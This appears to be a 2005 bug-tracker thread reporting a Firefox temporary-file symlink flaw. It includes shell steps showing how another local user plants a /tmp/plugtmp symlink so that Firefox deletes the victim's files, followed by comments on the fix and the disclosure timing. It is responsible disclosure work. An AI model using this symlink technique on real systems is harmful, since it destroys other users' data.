I reported this upstream, #281284, but no response yet. $ pwd /home/taviso $ mkdir test $ cd test $ for ((i=0;i<10;i++)); do touch ${RANDOM}.jpg; done $ ls 10659.jpg 16835.jpg 26339.jpg 4062.jpg 8234.jpg 15120.jpg 22838.jpg 29316.jpg 724.jpg 9053.jpg # now malicious user wants to remove these files (i'll use user nobody for this example) $ sudo -u nobody ln -s /home/taviso/test /tmp/plugtmp $ ls -l /tmp/plugtmp lrwxrwxrwx 1 nobody nobody 17 Feb 6 18:43 /tmp/plugtmp -> /home/taviso/test/ # now malicious user waits until I run firefox... $ firefox <exit firefox> $ ls $ echo 'arghhh, my files!'
fixed in upstream cvs (all branches)
Good catch Taviso. Upstream bug is still restricted.
Looks like a new point release is coming next week :) ------- Additional Comment #17 From Tavis Ormandy 2005-02-12 01:11 PST [reply] ------- can this bug be unrestricted now that it's RESOLVED? ------- Additional Comment #18 From Daniel Veditz 2005-02-12 03:01 PST [reply] ------- We'd prefer to wait until we get the 1.0.1 release into people's hands (which should be next week), but as the bug reporter you can disclose at any time if you think we're being too slow about it.
Now public, fixed in FF 1.0.1
Replaced by metabug 83267 *** This bug has been marked as a duplicate of 83267 ***